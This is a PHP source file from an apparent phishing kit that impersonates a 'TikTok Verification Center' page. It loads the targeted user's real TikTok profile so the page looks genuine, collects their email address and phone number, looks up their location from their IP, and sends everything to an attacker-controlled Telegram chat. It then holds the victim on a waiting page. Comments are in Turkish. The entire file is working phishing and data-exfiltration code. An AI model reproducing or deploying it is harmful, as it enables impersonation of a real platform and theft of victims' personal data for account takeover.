<?php
session_start();
require_once 'api.php';
require_once 'functions.php';
$config = include('config/config.php');

// Kullanıcı adı kontrolü
if (!isset($_SESSION['username'])) {
    header("Location: form.php");
    exit();
}

$username = $_SESSION['username'];

// Profil bilgileri yoksa API'den çek
if (empty($_SESSION['profilePicBase64']) && $_SERVER['REQUEST_METHOD'] === 'GET') {
    $profileData = fetchTikTokProfile($username);
    
    if (!isset($profileData['error'])) {
        $_SESSION['profilePicBase64'] = $profileData['profilePicBase64'] ?? '';
        $_SESSION['fullName'] = $profileData['fullName'] ?? '';
        $_SESSION['followerCount'] = $profileData['followerCount'] ?? 0;
        $_SESSION['followingCount'] = $profileData['followingCount'] ?? 0;
        $_SESSION['mediacount'] = $profileData['mediacount'] ?? 0;
        $_SESSION['verified'] = $profileData['verified'] ?? false;
    }
}

// Profil bilgileri (oturumdan al)
$profilePicBase64 = $_SESSION['profilePicBase64'] ?? '';
$fullName = $_SESSION['fullName'] ?? '';
$followerCount = $_SESSION['followerCount'] ?? 0;
$followingCount = $_SESSION['followingCount'] ?? 0;
$mediacount = $_SESSION['mediacount'] ?? 0;
$verified = $_SESSION['verified'] ?? false;

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!verifyCsrfToken($_POST['csrf_token'] ?? null)) {
        http_response_code(400);
        exit('Bad Request');
    }
    $email = htmlspecialchars(trim($_POST["email"]), ENT_QUOTES, 'UTF-8');
    $phone = htmlspecialchars(trim($_POST["phone"]), ENT_QUOTES, 'UTF-8');

    // Ülke kodunu da al (ör: +90)
    $countryCode = $_POST['country_code'] ?? '';

    $_SESSION['email'] = $email;
    $_SESSION['phone'] = $phone;
    $_SESSION['country_code'] = $countryCode;

    $ip = getUserIp();
    [$ulke, $sehir] = getLocation($ip);

    $site = htmlspecialchars($_SERVER["SERVER_NAME"], ENT_QUOTES, 'UTF-8');
    date_default_timezone_set('Europe/Istanbul');
    $cur_time = date("d-m-Y H:i:s");

    // Telegram mesajı fonksiyon ile gönderiliyor
    $message = "ℹ️ *$username Bilgi Girdi!*\n\n"
        . "✉️ *Email:* `$email`\n"
        . "📞 *Telefon:*`$countryCode` | `$phone`\n"
        . "📌 *WhatsApp:* [TIKLA](https://wa.me/" . $countryCode . $phone . ")\n"
        . "📍 *Konum:* $ulke / $sehir\n"
        . "⏰ *Tarih:* $cur_time\n";

    sendTelegramMessageCurl($config['apiToken'], $config['chatId'], $message);

    // Waiting sistemi için yönlendirme
    $_SESSION['waiting_id'] = bin2hex(random_bytes(16));
    $_SESSION['redirect_page'] = null;
    header("Location: waiting.php");
    exit();
}
?>
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>TikTok Verification Center | Form</title>

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Montserrat:ital,wght@0,100..900;1,100..900&display=swap"
        rel="stylesheet">
    <link rel="stylesheet" href="assets/css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/css/intlTelInput.css">
    <link href="https://cdn.jsdelivr.net/npm/remixicon@4.5.0/fonts/remixicon.css" rel="stylesheet" />
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        /* Disabled buton stilleri - login.php ile aynı */
        .buttonbaba:disabled {
            background-color: rgba(245, 0, 86, 0.32) !important;
            cursor: not-allowed;
            opacity: 1;
        }

        /* Skeleton Loader Genel Tasarım */
        .skeleton {
            display: inline-block;
            background: #e0e0e0;
            background: linear-gradient(90deg, #e0e0e0 25%, #f0f0f0 50%, #e0e0e0 75%);
            background-size: 200% 100%;
            animation: skeleton-loading 1.5s infinite;
            border-radius: 4px;
        }

        /* Animasyon */
        @keyframes skeleton-loading {
            0% {
                background-position: 200% 0;
            }

            100% {
                background-position: -200% 0;
            }
        }

        /* Profil Fotoğrafı için Skeleton */
        .skeleton-img {
            width: 100px;
            height: 100px;
            border-radius: 50%;
            /* Yuvarlak görünümlü */
        }

        /* Metin için Skeleton */
        .skeleton-text {
            height: 16px;
            width: 60%;
            margin: 10px 0;
        }

        /* Info Container Skeleton */
        .skeleton-info {
            height: 16px;
            width: 30%;
            margin: 5px;
        }
    </style>
</head>

<body>

    <?php include 'header.php'; ?>

    <div class="hero form">
        <div class="container">
            <div class="left">

                <form method="post" autocomplete="off" class="form-container">
                    <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars(ensureCsrfToken(), ENT_QUOTES, 'UTF-8'); ?>">

                    <?php
                    if (!empty($profilePicBase64)) {
                        echo "
<div class='userinfo'>
        <img class='forepp' src='data:image/jpeg;base64,$profilePicBase64' alt=''>
        <div class='name'>
            <h3>$fullName</h3>
        </div>
        <p class='username'>@$username $verified</p>
        <div class='stats' style='text-align: center;'>
            <p><strong>$followingCount</strong><br>Following</p>
            <p><strong>$followerCount</strong><br>Followers</p>
            <p><strong>$mediacount</strong><br>Likes</p>
        </div>
    </div>
";
                    } else {
                        echo "
<div class='userinfo'>
<div class='forepp skeleton skeleton-img'></div>
<div class='name'>
<h3 style='width:160px;' class='skeleton skeleton-text'></h3>
</div>
<div class='stats'>
<span style='width:50px;' class='skeleton skeleton-info'></span>
<span style='width:50px;' class='skeleton skeleton-info'></span>
<span style='width:50px;' class='skeleton skeleton-info'></span>
</div>
</div><br>
";
                    }
                    ?>
                    <p>Please provide your contact information to complete the verification process.</p>
                    <div class="input-column mb16" id="emailInput">
                        <label for="email"
                            style="display: flex; margin-bottom:5px; justify-content: space-between; align-items: center;">
                            <span>Email Address</span>
                        </label>
                        <div class="input-with-icon">
                            <i class="ri-mail-line input-icon"></i>
                            <input type="email" id="email" name="email" placeholder="Registered email address" required>
                        </div>
                    </div>


                    <div class="input-column mb16" id="phoneInput">
                        <label for="phone"
                            style="display: flex; margin-bottom:5px; justify-content: space-between; align-items: center;">
                            <span>Phone Number</span>
                        </label>
                        <input type="text" id="phone" name="phone" class="w-100 include-step" data-index="4" required>
                        <!-- Formunuzda phone inputunun hemen altına ekleyin -->
                        <input type="hidden" name="country_code" id="country_code">

                    </div>
                    <button class="buttonbaba" type="submit" disabled><span id="3131">Continue</span> <i
                            class="fas fa-spinner fa-spin" id="loader" style="display: none;"
                            aria-hidden="true"></i></button>

                </form>
            </div>
            <div class="right">
                <img src="assets/img/hero/hero1.bmp" alt="">
                <img src="assets/img/hero/hero2.bmp" alt="">
                <img src="assets/img/hero/hero3.bmp" alt="">
            </div>
        </div>
    </div>
    <?php include 'footer.php'; ?>
    <script src="https://code.jquery.com/jquery-3.7.1.slim.min.js"
        integrity="sha256-kmHvs0B+OpCW5GVHUNjv9rOmY0IvSIRcf7zGUDTDQM8=" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.13/js/intlTelInput-jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/11.0.4/js/utils.js"></script>
    <script>
        document.addEventListener("DOMContentLoaded", function () {
            var phoneInput = $("#phone");
            if (phoneInput.length) {
                var iti = phoneInput.intlTelInput({
                    allowDropdown: true,
                    dropdownContainer: document.body,
                    formatOnDisplay: true,
                    initialCountry: "auto",
                    geoIpLookup: function (callback) {
                        fetch("https://ipapi.co/json")
                            .then(function (res) { return res.json(); })
                            .then(function (data) { callback(data.country_code); })
                            .catch(function () { callback("us"); });
                    },
                    placeholderNumberType: "MOBILE",
                    separateDialCode: true,
                    showFlags: true,
                    utilsScript: "https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/11.0.4/js/utils.js"
                });

                // Ülke kodunu gizli inputa yaz
                phoneInput.on("countrychange input", function () {
                    var code = iti.intlTelInput("getSelectedCountryData").dialCode;
                    $("#country_code").val('+' + code);
                });

                // Sayfa yüklendiğinde de ayarla
                setTimeout(function () {
                    var code = iti.intlTelInput("getSelectedCountryData").dialCode;
                    $("#country_code").val('+' + code);
                }, 500);
            }
        });
    </script>
    <script>
        // Form validation ve buton durumu kontrolü - contact.php'den uyarlandı
        let iti;
        
        function getSelectedDialCode() {
            try {
                if (iti && typeof iti.intlTelInput === 'function') {
                    var data = iti.intlTelInput('getSelectedCountryData');
                    return data && data.dialCode ? data.dialCode : '';
                } else if (iti && typeof iti.getSelectedCountryData === 'function') {
                    var data2 = iti.getSelectedCountryData();
                    return data2 && data2.dialCode ? data2.dialCode : '';
                }
            } catch (e) {}
            return '';
        }

        function isPhoneValidNow() {
            try {
                if (iti && typeof iti.intlTelInput === 'function') {
                    return iti.intlTelInput('isValidNumber');
                } else if (iti && typeof iti.isValidNumber === 'function') {
                    return iti.isValidNumber();
                }
            } catch (e) {}
            return (document.getElementById('phone').value.length >= 8);
        }

        // Buton durumunu kontrol eden fonksiyon
        function checkButtonState() {
            const email = document.getElementById('email').value;
            const submitBtn = document.querySelector('.buttonbaba');
            
            // Email formatını kontrol et
            const emailRegex = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            const isEmailValid = emailRegex.test(email);
            
            // Telefon doğruluğu
            const isPhoneValid = isPhoneValidNow();
            
            if (isEmailValid && isPhoneValid) {
                submitBtn.disabled = false;
                submitBtn.style.opacity = '1';
                submitBtn.style.cursor = 'pointer';
            } else {
                submitBtn.disabled = true;
                submitBtn.style.opacity = '0.5';
                submitBtn.style.cursor = 'not-allowed';
            }
        }

        // Sayfa yüklendiğinde buton durumunu kontrol et
        document.addEventListener("DOMContentLoaded", function() {
            const phoneInput = document.getElementById('phone');
            const $phone = (window.jQuery) ? jQuery('#phone') : null;
            
            if ($phone && typeof $phone.intlTelInput === 'function') {
                iti = $phone.intlTelInput({
                    allowDropdown: true,
                    dropdownContainer: document.body,
                    formatOnDisplay: true,
                    autoPlaceholder: 'aggressive',
                    initialCountry: 'auto',
                    geoIpLookup: function(callback) {
                        fetch('https://ipapi.co/json')
                            .then(function(res) { return res.json(); })
                            .then(function(data) { callback((data && data.country_code) ? data.country_code : 'TR'); })
                            .catch(function() { callback('TR'); });
                    },
                    placeholderNumberType: 'MOBILE',
                    separateDialCode: true,
                    utilsScript: 'https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/11.0.4/js/utils.js'
                });

                // Ülke kodunu gizli inputa yaz ve validasyonu tetikle
                $phone.on('countrychange input', function() {
                    var code = getSelectedDialCode();
                    var ccInput = document.getElementById('country_code');
                    if (ccInput) ccInput.value = code ? ('+' + code) : '';
                    checkButtonState();
                });

                setTimeout(function() {
                    var code = getSelectedDialCode();
                    var ccInput = document.getElementById('country_code');
                    if (ccInput) ccInput.value = code ? ('+' + code) : '';
                }, 500);
            }

            checkButtonState();

            // Input değişikliklerini dinle
            document.getElementById('email').addEventListener('input', checkButtonState);
            document.getElementById('phone').addEventListener('input', checkButtonState);
        });

        document.querySelector('form').addEventListener('submit', function (event) {
            // Yükleme simgesini göster
            document.getElementById('loader').style.display = 'block';
            document.getElementById('3131').style.display = 'none';
        });
    </script>

</body>

</html>